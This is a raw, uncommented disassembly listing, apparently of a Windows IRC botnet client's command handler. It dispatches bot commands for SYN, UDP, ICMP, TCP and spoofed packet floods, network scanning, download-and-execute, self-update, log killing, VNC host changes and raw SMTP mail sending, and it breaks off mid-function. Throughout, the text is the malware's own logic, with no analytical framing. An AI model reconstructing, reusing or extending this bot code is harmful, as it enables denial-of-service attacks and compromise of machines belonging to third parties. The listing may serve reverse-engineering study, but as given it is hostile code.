mov [ebp+Src], ebx
cmp eax, ebx
mov [ebp+arg_18], eax
jz short loc_4062EA
push eax ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
mov [ebp+Src], eax
pop ecx
loc_4062EA: ; CODE XREF: sub_401CC7+4613�j
push edi ; Str2
push offset aStart ; "start"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_406343
cmp [ebp+arg_18], ebx
jz short loc_406317
push [ebp+Src]
push 3
call sub_4195C6
pop ecx
pop ecx
push eax
push offset aS_3 ; "%s"
jmp loc_407019
; ---------------------------------------------------------------------------
loc_406317: ; CODE XREF: sub_401CC7+4637�j
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_419860
add esp, 0Ch
test eax, eax
jz short loc_406339
push offset unk_4431F0
jmp loc_40891F
; ---------------------------------------------------------------------------
loc_406339: ; CODE XREF: sub_401CC7+4666�j
push offset unk_443214
jmp loc_40891F
; ---------------------------------------------------------------------------
loc_406343: ; CODE XREF: sub_401CC7+4632�j
push edi ; Str2
push offset aStop ; "stop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40636B
push [ebp+Src]
push 4
call sub_4195C6
pop ecx
pop ecx
push eax
push offset aS_4 ; "%s"
jmp loc_407019
; ---------------------------------------------------------------------------
loc_40636B: ; CODE XREF: sub_401CC7+468B�j
push edi ; Str2
push offset aPause ; "pause"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_406393
push [ebp+Src]
push 5
call sub_4195C6
pop ecx
pop ecx
push eax
push offset aS_5 ; "%s"
jmp loc_407019
; ---------------------------------------------------------------------------
loc_406393: ; CODE XREF: sub_401CC7+46B3�j
push edi ; Str2
push offset aContinue ; "continue"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4063BB
push [ebp+Src]
push 6
call sub_4195C6
pop ecx
pop ecx
push eax
push offset aS_6 ; "%s"
jmp loc_407019
; ---------------------------------------------------------------------------
loc_4063BB: ; CODE XREF: sub_401CC7+46DB�j
push edi ; Str2
push offset aDelete_0 ; "delete"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4063E3
push [ebp+Src]
push 1
call sub_4195C6
pop ecx
pop ecx
push eax
push offset aS_7 ; "%s"
jmp loc_407019
; ---------------------------------------------------------------------------
loc_4063E3: ; CODE XREF: sub_401CC7+4703�j
push edi ; Str2
push offset aShare ; "share"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_406465
cmp [ebp+arg_18], ebx
jz short loc_406438
cmp [ebp+var_8FC], bl
jz short loc_40641A
push ebx ; int
push [ebp+arg_18] ; Str
push 1 ; int
call sub_41999D
add esp, 0Ch
push eax
push offset aS_8 ; "%s"
jmp loc_407019
; ---------------------------------------------------------------------------
loc_40641A: ; CODE XREF: sub_401CC7+4738�j
push [ebp+esi+Str2] ; int
push [ebp+arg_18] ; Str
push ebx ; int
call sub_41999D
add esp, 0Ch
push eax
push offset aS_9 ; "%s"
jmp loc_407019
; ---------------------------------------------------------------------------
loc_406438: ; CODE XREF: sub_401CC7+4730�j
push ebx ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_419B93
add esp, 10h
test eax, eax
jz short loc_40645B
push offset unk_443278
jmp loc_40891F
; ---------------------------------------------------------------------------
loc_40645B: ; CODE XREF: sub_401CC7+4788�j
push offset unk_44329C
jmp loc_40891F
; ---------------------------------------------------------------------------
loc_406465: ; CODE XREF: sub_401CC7+472B�j
push edi ; Str2
push offset aUser_0 ; "user"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40651D
mov eax, [ebp+arg_18]
cmp eax, ebx
jz short loc_4064F0
cmp [ebp+var_8FC], bl
jz short loc_4064AC
push [ebp+var_4]
push [ebp+Format]
push [ebp+arg_4]
push ebx
push eax
push 1
call sub_419CB4
add esp, 18h
push eax
push offset aS_10 ; "%s"
jmp loc_407019
; ---------------------------------------------------------------------------
loc_4064AC: ; CODE XREF: sub_401CC7+47C0�j
push [ebp+var_4]
mov esi, [ebp+esi+Str2]
cmp esi, ebx
push [ebp+Format]
push [ebp+arg_4]
jz short loc_4064D9
push esi
push eax
push ebx
call sub_419CB4
add esp, 18h
push eax
push offset aS_11 ; "%s"
jmp loc_407019
; ---------------------------------------------------------------------------
loc_4064D9: ; CODE XREF: sub_401CC7+47FA�j
push ebx
push eax
push 2
call sub_419CB4
add esp, 18h
push eax
push offset aS_12 ; "%s"
jmp loc_407019
; ---------------------------------------------------------------------------
loc_4064F0: ; CODE XREF: sub_401CC7+47B8�j
push ebx ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_41A1E4
add esp, 10h
test eax, eax
jz short loc_406513
push offset unk_4432D0
jmp loc_40891F
; ---------------------------------------------------------------------------
loc_406513: ; CODE XREF: sub_401CC7+4840�j
push offset unk_4432F0
jmp loc_40891F
; ---------------------------------------------------------------------------
loc_40651D: ; CODE XREF: sub_401CC7+47AD�j
push edi ; Str2
push offset aSend_0 ; "send"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40655F
cmp [ebp+arg_18], ebx
jz short loc_406555
push [ebp+var_4]
push [ebp+Format]
push [ebp+arg_4]
push [ebp+Src] ; Source
call sub_41A498
add esp, 10h
push eax
push offset aS_13 ; "%s"
jmp loc_407019
; ---------------------------------------------------------------------------
loc_406555: ; CODE XREF: sub_401CC7+486A�j
push offset unk_44331C
jmp loc_40891F
; ---------------------------------------------------------------------------
loc_40655F: ; CODE XREF: sub_401CC7+4865�j
push offset unk_443340
jmp loc_40891F
; ---------------------------------------------------------------------------
loc_406569: ; CODE XREF: sub_401CC7+45DB�j
push [ebp+arg_8] ; Str2
push offset aCapture ; "capture"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40914B
push [ebp+arg_8] ; Str2
push offset aCap ; "cap"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40914B
push [ebp+arg_8] ; Str2
push offset aGethost ; "gethost"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40905D
push [ebp+arg_8] ; Str2
push offset aGh ; "gh"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40905D
loc_4065C5: ; CODE XREF: sub_401CC7+3CEA�j
; sub_401CC7+3D20�j ...
mov eax, [ebp+esi+Format]
cmp eax, ebx
mov [ebp+arg_18], eax
jz loc_402166
push [ebp+arg_8] ; Str2
push offset aKilllog ; "killlog"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409040
push [ebp+arg_8] ; Str2
push offset aKl ; "kl"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409040
push [ebp+arg_8] ; Str2
push offset aAddalias ; "addalias"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40900E
push [ebp+arg_8] ; Str2
push offset aAa ; "aa"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40900E
push [ebp+arg_8] ; Str2
push offset aPrivmsg_1 ; "privmsg"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408FBD
push [ebp+arg_8] ; Str2
push offset aPm ; "pm"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408FBD
push [ebp+arg_8] ; Str2
push offset aAction ; "action"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408F54
push [ebp+arg_8] ; Str2
push offset aA ; "a"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408F54
push [ebp+arg_8] ; Str2
push offset aCycle ; "cycle"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408EEE
push [ebp+arg_8] ; Str2
push offset aCy ; "cy"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408EEE
push [ebp+arg_8] ; Str2
push offset aMode_0 ; "mode"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408EB4
push [ebp+arg_8] ; Str2
push offset aM ; "m"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408EB4
push [ebp+arg_8] ; Str2
push offset aC_raw ; "c_raw"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408E46
push [ebp+arg_8] ; Str2
push offset aC_r ; "c_r"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408E46
push [ebp+arg_8] ; Str2
push offset aC_mode ; "c_mode"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408DC1
push [ebp+arg_8] ; Str2
push offset aC_m ; "c_m"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408DC1
push [ebp+arg_8] ; Str2
push offset aC_nick ; "c_nick"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408D50
push [ebp+arg_8] ; Str2
push offset aC_n ; "c_n"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408D50
push [ebp+arg_8] ; Str2
push offset aC_join ; "c_join"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408D04
push [ebp+arg_8] ; Str2
push offset aC_j ; "c_j"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408D04
push [ebp+arg_8] ; Str2
push offset aC_part ; "c_part"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408CA4
push [ebp+arg_8] ; Str2
push offset aC_p ; "c_p"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408CA4
push [ebp+arg_8] ; Str2
push offset aTarga3 ; "targa3"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408BA9
push [ebp+arg_8] ; Str2
push offset aT3 ; "t3"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408BA9
push [ebp+arg_8] ; Str2
push offset aTsunami ; "tsunami"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408AD4
push [ebp+arg_8] ; Str2
push offset aTsn ; "tsn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408AD4
push [ebp+arg_8] ; Str2
push offset aRepeat ; "repeat"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4089CF
push [ebp+arg_8] ; Str2
push offset aRp ; "rp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4089CF
push [ebp+arg_8] ; Str2
push offset aDelay ; "delay"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408932
push [ebp+arg_8] ; Str2
push offset aDe ; "de"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408932
push [ebp+arg_8] ; Str2
push offset aUpdate ; "update"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4087A3
push [ebp+arg_8] ; Str2
push offset aUp_0 ; "up"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4087A3
push [ebp+arg_8] ; Str2
push offset aExecute ; "execute"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408710
push [ebp+arg_8] ; Str2
push offset aE ; "e"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408710
push [ebp+arg_8] ; Str2
push offset aFindfile ; "findfile"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408601
push [ebp+arg_8] ; Str2
push offset aFf ; "ff"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408601
push [ebp+arg_8] ; Str2
push offset aRename ; "rename"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40858A
push [ebp+arg_8] ; Str2
push offset aMv ; "mv"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40858A
push [ebp+arg_8] ; Str2
push offset aIcmpflood ; "icmpflood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40848D
push [ebp+arg_8] ; Str2
push offset aIcmp ; "icmp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40848D
mov eax, [ebp+esi+Str2]
cmp eax, ebx
mov [ebp+Src], eax
jz loc_402166
push [ebp+arg_8] ; Str2
push offset aClone_0 ; "clone"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4083A5
push [ebp+arg_8] ; Str2
push offset aC ; "c"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4083A5
push [ebp+arg_8] ; Str2
push offset aDdos_syn ; "ddos.syn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4082AC
push [ebp+arg_8] ; Str2
push offset aDdos_ack ; "ddos.ack"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4082AC
push [ebp+arg_8] ; Str2
push offset aDdos_random ; "ddos.random"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4082AC
push [ebp+arg_8] ; Str2
push offset aWisdom_udp ; "wisdom.udp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_406AD8
push 7Fh
lea eax, [ebp+var_327C]
pop esi
push esi ; Count
push edi ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_31FC]
push [ebp+arg_18] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_317C]
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_30FC]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+var_8]
mov edi, [ebp+var_4]
mov esi, [ebp+arg_4]
mov [ebp+var_3074], eax
push ebx ; int
lea eax, [ebp+Dst]
push 13h ; int
push eax ; Source
mov [ebp+var_3078], edi
mov [ebp+var_3280], esi
call sub_40B78E
add esp, 3Ch
mov [ebp+var_307C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3280]
push ebx
push eax
push offset sub_415187
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_307C]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_406AC7
loc_406AB1: ; CODE XREF: sub_401CC7+4DFE�j
cmp [ebp+var_3070], ebx
jnz loc_403F5A
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_406AB1
; ---------------------------------------------------------------------------
loc_406AC7: ; CODE XREF: sub_401CC7+4DE8�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_443D8C
jmp loc_403F4B
; ---------------------------------------------------------------------------
loc_406AD8: ; CODE XREF: sub_401CC7+4D3E�j
push [ebp+arg_8] ; Str2
push offset aSynflood ; "synflood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4081C4
push [ebp+arg_8] ; Str2
push offset aSyn ; "syn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4081C4
push [ebp+arg_8] ; Str2
push offset aSkysyn ; "skysyn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_406C05
push 7Fh
lea eax, [ebp+var_36A4]
pop esi
push esi ; Count
push edi ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3624]
push [ebp+arg_18] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_35A4]
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3524]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 30h
mov esi, [ebp+arg_4]
mov [ebp+var_34A0], eax
push [ebp+Src]
mov eax, [ebp+var_8]
mov [ebp+var_349C], eax
lea eax, [ebp+Dst]
push [ebp+arg_18]
mov [ebp+var_36A8], esi
push edi
push offset asc_443E4C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 10h ; int
push eax ; Source
call sub_40B78E
add esp, 20h
mov [ebp+var_34A4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_36A8]
push ebx
push eax
push offset sub_4140DF
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_34A4]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_406BF4
loc_406BDE: ; CODE XREF: sub_401CC7+4F2B�j
cmp [ebp+var_3498], ebx
jnz loc_4075C0
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_406BDE
; ---------------------------------------------------------------------------
loc_406BF4: ; CODE XREF: sub_401CC7+4F15�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset dword_443E7C
jmp loc_4075B1
; ---------------------------------------------------------------------------
loc_406C05: ; CODE XREF: sub_401CC7+4E50�j
push [ebp+arg_8] ; Str2
push offset aPhatwonk ; "phatwonk"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4080DC
push [ebp+arg_8] ; Str2
push offset aWonk ; "wonk"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4080DC
push [ebp+arg_8] ; Str2
push offset aDownload ; "download"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407F9E
push [ebp+arg_8] ; Str2
push offset aDl ; "dl"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407F9E
push [ebp+arg_8] ; Str2
push offset aRedirect ; "redirect"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407EA1
push [ebp+arg_8] ; Str2
push offset aRd ; "rd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407EA1
push [ebp+arg_8] ; Str2
push offset aScan_2 ; "scan"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407DAE
push [ebp+arg_8] ; Str2
push offset aSc ; "sc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407DAE
push [ebp+arg_8] ; Str2
push offset aC_privmsg ; "c_privmsg"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407CB1
push [ebp+arg_8] ; Str2
push offset aC_pm ; "c_pm"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407CB1
push [ebp+arg_8] ; Str2
push offset aC_action ; "c_action"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407BC1
push [ebp+arg_8] ; Str2
push offset aC_a ; "c_a"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407BC1
mov eax, [ebp+esi+var_80]
cmp eax, ebx
mov [ebp+arg_1C], eax
jz loc_402166
push [ebp+arg_8] ; Str2
push offset aPortscan ; "portscan"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407ABB
push [ebp+arg_8] ; Str2
push offset aPsc ; "psc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407ABB
push [ebp+arg_8] ; Str2
push offset aAdvscan ; "advscan"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4075E0
push [ebp+arg_8] ; Str2
push offset aAsc ; "asc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4075E0
push [ebp+arg_8] ; Str2
push offset aUdpflood ; "udpflood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407497
push [ebp+arg_8] ; Str2
push offset aUdp ; "udp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407497
push [ebp+arg_8] ; Str2
push offset aU ; "u"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407497
push [ebp+arg_8] ; Str2
push offset aNetsend ; "netsend"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407389
push [ebp+arg_8] ; Str2
push offset aNs ; "ns"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407389
push [ebp+arg_8] ; Str2
push offset aPingflood ; "pingflood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40725F
push [ebp+arg_8] ; Str2
push offset aPing_0 ; "ping"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40725F
push [ebp+arg_8] ; Str2
push offset aP ; "p"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40725F
push [ebp+arg_8] ; Str2
push offset aVnchost ; "vnchost"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_406E84
push edi
call sub_41C5F5
pop ecx
lea eax, [ebp+Dst]
push edi
push offset aVncHttpHostCha ; "VNC: HTTP Host Changed To: %s"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz loc_402166
push ebx
lea eax, [ebp+Dst]
push [ebp+var_4]
push eax
jmp loc_4042DD
; ---------------------------------------------------------------------------
loc_406E84: ; CODE XREF: sub_401CC7+5186�j
push [ebp+arg_8] ; Str2
push offset aTcpflood ; "tcpflood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4070B8
push [ebp+arg_8] ; Str2
push offset aTcp ; "tcp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4070B8
push [ebp+arg_8] ; Str2
push offset aEmail ; "email"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_407060
lea eax, [ebp+var_47EC]
push edi ; Source
push eax ; Dest
call _strcpy
push [ebp+arg_18] ; Str
call _atoi
push [ebp+Src] ; Source
mov [ebp+arg_18], eax
lea eax, [ebp+var_4188]
push eax ; Dest
call _strcpy
push [ebp+arg_1C] ; Source
lea eax, [ebp+var_4588]
push eax ; Dest
call _strcpy
push offset asc_44467C ; " "
push offset a__1 ; "_"
push [ebp+esi+var_7C] ; Src
call sub_418C3F
push eax ; Source
lea eax, [ebp+var_4288]
push eax ; Dest
call _strcpy
add esp, 30h
lea eax, [ebp+var_5588]
push eax
push 101h
call dword_4E4190 ; WSAStartup
lea eax, [ebp+var_47EC]
push eax
call dword_4E42A4 ; gethostbyname
push 6
push 1
push 2
mov edi, eax
call dword_4E42A0 ; socket
push [ebp+arg_18]
mov esi, eax
mov [ebp+var_31C], 2
mov eax, [edi+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_318], eax
call dword_4E4220 ; htons
mov [ebp+var_31A], ax
lea eax, [ebp+var_4288]
push eax
lea eax, [ebp+var_4188]
push eax
lea eax, [ebp+var_4288]
push eax
lea eax, [ebp+var_4588]
push eax
lea eax, [ebp+var_4188]
push eax
lea eax, [ebp+var_5988]
push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "...
push eax ; Dest
call _sprintf
add esp, 1Ch
lea eax, [ebp+var_31C]
push 10h
push eax
push esi
call dword_4E41C8 ; connect
mov edi, 100h
push ebx
lea eax, [ebp+var_4088]
push edi
push eax
push esi
call dword_4E4238 ; recv
lea eax, [ebp+var_4088]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_5988]
push eax
push esi
call dword_4E4270 ; send
push ebx
lea eax, [ebp+var_4088]
push edi
push eax
push esi
call dword_4E4238 ; recv
push esi
call dword_4E42B8 ; closesocket
call dword_4E4178 ; WSACleanup
lea eax, [ebp+var_4588]
push eax
push offset asc_4446D0 ; "-"
loc_407019: ; CODE XREF: sub_401CC7+2E8B�j
; sub_401CC7+464B�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
loc_407025: ; CODE XREF: sub_401CC7+244B�j
add esp, 0Ch
loc_407028: ; CODE XREF: sub_401CC7+45FE�j
; sub_401CC7+67A5�j ...
cmp [ebp+var_8], ebx
jnz short loc_407049
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 14h
loc_407049: ; CODE XREF: sub_401CC7+29A7�j
; sub_401CC7+29FA�j ...
mov esi, [ebp+File]
loc_40704C: ; CODE XREF: sub_401CC7+6A44�j
; sub_401CC7+7A36�j ...
lea eax, [ebp+Dst]
push eax
call sub_415C77
pop ecx
mov eax, esi
jmp loc_402169
; ---------------------------------------------------------------------------
loc_407060: ; CODE XREF: sub_401CC7+51FC�j
push [ebp+arg_8] ; Str2
push offset aHttpcon ; "httpcon"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40708A
push [ebp+arg_8] ; Str2
push offset aHcon ; "hcon"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_407632
loc_40708A: ; CODE XREF: sub_401CC7+53AA�j
push [ebp+esi+var_7C] ; int
push [ebp+arg_1C] ; int
push [ebp+Src] ; int
push [ebp+arg_18] ; Str
call _atoi
pop ecx
push eax ; int
push edi ; int
push [ebp+var_8] ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_410B94
jmp loc_404299
; ---------------------------------------------------------------------------
loc_4070B8: ; CODE XREF: sub_401CC7+51CE�j
; sub_401CC7+51E5�j
mov esi, 80h
push edi ; Format
lea eax, [ebp+var_1354]
push esi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+var_1354]
push eax ; Str2
push offset aSyn_0 ; "syn"
call _strcmp
add esp, 14h
test eax, eax
jz short loc_40711B
lea eax, [ebp+var_1354]
push eax ; Str2
push offset aAck ; "ack"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40711B
lea eax, [ebp+var_1354]
push eax ; Str2
push offset aRandom_0 ; "random"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40711B
push offset unk_444648
jmp loc_40724C
; ---------------------------------------------------------------------------
loc_40711B: ; CODE XREF: sub_401CC7+541A�j
; sub_401CC7+5431�j ...
push [ebp+arg_1C] ; Str
call _atoi
cmp eax, ebx
pop ecx
mov [ebp+var_124C], eax
jle loc_407247
push edi ; Format
lea eax, [ebp+var_1354]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
lea eax, [ebp+var_13D4]
push [ebp+arg_18] ; Format
push esi ; Count
push eax ; Dest
call __snprintf
push [ebp+Src] ; Str
call _atoi
mov [ebp+var_1250], eax
add esp, 10h
xor eax, eax
cmp [ebp+var_8EE], bl
push [ebp+Format] ; Format
setnz al
mov [ebp+var_1248], eax
mov eax, [ebp+arg_4]
mov [ebp+var_13D8], eax
lea eax, [ebp+var_12D4]
push esi ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+var_4]
add esp, 0Ch
cmp [ebp+var_1248], ebx
mov [ebp+var_1244], eax
mov eax, [ebp+var_8]
mov [ebp+var_1240], eax
mov eax, offset aSpoofed ; "Spoofed"
jnz short loc_4071B8
mov eax, offset aNormal ; "Normal"
loc_4071B8: ; CODE XREF: sub_401CC7+54EA�j
push [ebp+arg_1C]
push [ebp+Src]
push [ebp+arg_18]
push edi
push eax
push offset asc_4445A4 ; "-"
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
push ebx ; int
lea eax, [ebp+Dst]
push 14h ; int
push eax ; Source
call sub_40B78E
add esp, 2Ch
mov [ebp+var_1254], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_13D8]
push ebx
push eax
push offset sub_4148EE
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_1254]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_407236
loc_407220: ; CODE XREF: sub_401CC7+556D�j
cmp [ebp+var_123C], ebx
jnz loc_4085D7
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_407220
; ---------------------------------------------------------------------------
loc_407236: ; CODE XREF: sub_401CC7+5557�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_4445D8
jmp loc_404BEE
; ---------------------------------------------------------------------------
loc_407247: ; CODE XREF: sub_401CC7+5465�j
push offset asc_444610 ; "-"
loc_40724C: ; CODE XREF: sub_401CC7+1FD8�j
; sub_401CC7+1FEE�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_4085D7
; ---------------------------------------------------------------------------
loc_40725F: ; CODE XREF: sub_401CC7+5141�j
; sub_401CC7+5158�j ...
cmp dword_4E4310, ebx
jnz loc_40736E
mov eax, [ebp+var_8]
push 7Fh ; Count
mov [ebp+var_FF4], eax
mov eax, [ebp+var_4]
mov [ebp+var_FF8], eax
lea eax, [ebp+var_108C]
push edi ; Source
push eax ; Dest
call _strncpy
push [ebp+arg_18] ; Str
call _atoi
push [ebp+Src] ; Str
mov [ebp+var_100C], eax
call _atoi
push [ebp+arg_1C] ; Str
mov [ebp+var_1008], eax
call _atoi
push 7Fh ; Count
mov [ebp+var_1004], eax
push [ebp+Format] ; Source
lea eax, [ebp+var_110C]
push eax ; Dest
call _strncpy
mov eax, [ebp+arg_4]
add esp, 24h
mov [ebp+var_1110], eax
lea eax, [ebp+var_108C]
push [ebp+var_1004]
push [ebp+var_1008]
push eax
lea eax, [ebp+Dst]
push [ebp+var_100C]
push offset asc_4444B4 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 16h ; int
push eax ; Source
call sub_40B78E
add esp, 24h
mov [ebp+var_FFC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1110]
push ebx
push eax
push offset sub_413D3D
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_FFC]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_40735D
loc_407347: ; CODE XREF: sub_401CC7+5694�j
cmp [ebp+var_FF0], ebx
jnz loc_4085D7
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_407347
; ---------------------------------------------------------------------------
loc_40735D: ; CODE XREF: sub_401CC7+567E�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_4444FC
jmp loc_404BEE
; ---------------------------------------------------------------------------
loc_40736E: ; CODE XREF: sub_401CC7+559E�j
push 1FFh ; Count
lea eax, [ebp+Dst]
push offset aIcmp_dllNotAva ; "ICMP.dll not available"
push eax ; Dest
call _strncpy
jmp loc_4085D4
; ---------------------------------------------------------------------------
loc_407389: ; CODE XREF: sub_401CC7+5113�j
; sub_401CC7+512A�j
push [ebp+arg_18]
lea eax, [ebp+Dst]
push edi
